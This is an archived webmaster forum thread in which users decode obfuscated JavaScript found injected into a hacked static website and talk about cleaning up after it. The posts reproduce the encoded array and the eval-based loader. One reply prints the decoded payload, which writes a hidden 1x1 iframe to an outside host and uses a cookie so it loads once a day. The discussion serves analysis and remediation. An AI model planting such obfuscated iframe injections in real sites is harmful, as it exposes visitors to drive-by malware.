Welcome to WebmasterWorld Guest from 54.196.224.166

Forum Moderators: open

Message Too Old, No Replies

Probable injection - can anyone translate

     

topr8

8:16 am on May 13, 2013 (gmt 0)

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



a friend of mine seems to have had some kind of javascript injection into their site ... i've cleaned it all up for them, i suspect the host is to blame as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the ftp was hacked but i doubt it.

anyway, any idea what this means, this was the first bit, i assume they translate to characters in some way...

a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,
16,44,172,145,166,44,171,171,172,44,101,44,150,163,147,171,161,151,162,170,62,147,
166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,
53,55,77,21,16,21,16,44,171,171,172,62,167,166,147,44,101,44,53,154,170,170,164,
76,63,63,152,145,160,160,163,171,170,67,62,145,147,147,155,62,147,176,63,153,
114,165,133,106,170,166,174,62,164,154,164,53,77,21,16,44,171,171,172,62,167,
170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,
163,160,171,170,151,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,146,
163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,171,171,172,62,167,170,175,
160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,171,
171,172,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,
53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,160,151,152,170,44,101,44,
53,65,164,174,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,170,163,164,
44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,
161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,
53,171,171,172,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,
166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,171,171,172,140,53,
102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,
153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,171,171,172,53,
55,62,145,164,164,151,162,150,107,154,155,160,150,54,171,171,172,55,77,21,16,44,
201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,
157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,
151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,
21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,
170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,
162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,
175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,
64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,
167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,
161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,
55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,
101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,
145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,
44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,
151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,
164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,
145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,
163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,
44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,
171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,
152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,
44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,
160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,
167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,
101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,
171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,
151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,
44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,
162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,
160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,
101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,
151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,
154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,
145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,
162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,
162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,
162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,
21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","))

bhonda

8:54 am on May 13, 2013 (gmt 0)

10+ Year Member



Was there any code to use it? I've just searched for a subset of this code and noticed some have this before it -

ss=eval("Str"+"ing");d=document;a=("44,152...

topr8

9:24 am on May 13, 2013 (gmt 0)

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



yes, i found a few sites had it when i did a search...

the full code was:
as pasted above followed by...

ss=eval("Str"+"ing");d=document;for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));




so the a= was at the beginning in this case.

bhonda

11:17 am on May 13, 2013 (gmt 0)

10+ Year Member



So, the first few numbers in the array would be -

32
102
117
110

Are they HTML codes?

32 = [space]
102 = f
117 = u
110 = n
99 = c
116 = t
105 = i
111 = o
110 = n

Hmm...looks so. Anyone fancy writing a little convertor for this?

astupidname

11:44 am on May 13, 2013 (gmt 0)

5+ Year Member



That string you posted (definition of the 'a' variable) has illegal new lines in it (broken string) so after replacing new lines, remove the other bits of code which appear after the definition of the 'a' variable and replace with the following:
d=document;
for(i=0;i<a.length;i+=1){
a[i]=parseInt(a[i],8)-(7-3);
}
try{d.body++}catch(q){zz=0;}
try{zz&=2}catch(q){zz=1;}
if(!zz)if(window["document"])a = String.fromCharCode.apply(String, a);
alert(a);


The non-evaluated code as a string is then presented to you as:

 function zzzfff() {
var uuv = document.createElement('iframe');

uuv.src = 'http://example.com';
uuv.style.position = 'absolute';
uuv.style.border = '0';
uuv.style.height = '1px';
uuv.style.width = '1px';
uuv.style.left = '1px';
uuv.style.top = '1px';

if (!document.getElementById('uuv')) {
document.write('<div id=\'uuv\'></div>');
document.getElementById('uuv').appendChild(uuv);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
}
}

[edited by: whoisgregg at 2:05 pm (utc) on May 16, 2013]
[edit reason] sanitized url [/edit]

bhonda

11:46 am on May 13, 2013 (gmt 0)

10+ Year Member



Man, you got there just before I did!

Might be worth removing the URL.

topr8

5:25 am on May 18, 2013 (gmt 0)

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



thanks for the replies - i thought the thread had been deleted!

lucy24

7:09 am on May 18, 2013 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



as pasted above followed by...

Aha, the missing link. If you take the original numbers at face value it's garbage:
,˜«ą“Ș›Łą,°°°˜˜˜
et cetera. (The number that turns into 32, i.e. space, starts out as 44 which happens to be a comma.)

illegal new lines

I think they were inserted by a moderator because the original post would otherwise have circled the earth :)

jimbeetle

10:17 pm on May 18, 2013 (gmt 0)

WebmasterWorld Senior Member jimbeetle is a WebmasterWorld Top Contributor of All Time 10+ Year Member



i suspect the host is to blame as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the ftp was hacked but i doubt it

The host doesn't have to be the to blame, the site doesn't have to run a database or any scripts. And *don't* doubt that the ftp was hacked.

Have your friend scrub the locl machine just in case a keylogger was downloaded. This is a *very* common technique for the bad guys to capture passwords. I was hit a few years ago.

i've cleaned it all up for them

Are you sure? Did you just clean the files or did you find the file the bad guys might have left behind?

topr8

2:37 pm on May 19, 2013 (gmt 0)

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



>>I think they were inserted by a moderator because the original post would otherwise have circled the earth

actually yes, i make the line breaks before posting, as i realised it would have stretched on forever!

>>Are you sure?

well i did my best ... deleted all the files on the server from their filespace.
then manually checked every file (there were not that many, only around 50 and they were only plain html) i removed all the 'injected' lines of code.
i also suggested that they reinstall windows on their local machine, which they said they did, they live in a different town to me, i wasn't going to drive over and do it for them!

but i appreciate your point jim, this is not my area of expertise and it is entirely possible that i may have missed something. so far though the injection hasn't recurred.

thanks for everyone's input, much appreciated.

so i can see the code set a presumably malicious iframe, which would have tried to run some kind of script on the site visitors machines.... i guess this is the common purpose of these type of injection attacks.

jimbeetle

3:31 pm on May 21, 2013 (gmt 0)

WebmasterWorld Senior Member jimbeetle is a WebmasterWorld Top Contributor of All Time 10+ Year Member



It's not my area of expertise at all, either, just that one very painful experience.

I'm assuming it's shared hosting so it might be best to contact the host so it can clean any spurious files off the server as from what I shakily understand there can be cross-domain contamination.

topr8

5:22 pm on May 21, 2013 (gmt 0)

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



i figured it was probably an infection at the host level, but the host was adamant it wasn't them - no knowing if that is true or not though.

i advised them to move hosts anyway just in case, seemed the obvious thing to do.

it made me glad of my own set up! dedicated server, and a hardware firewall which only allows ftp, ssh and any admin page access from my own ip address.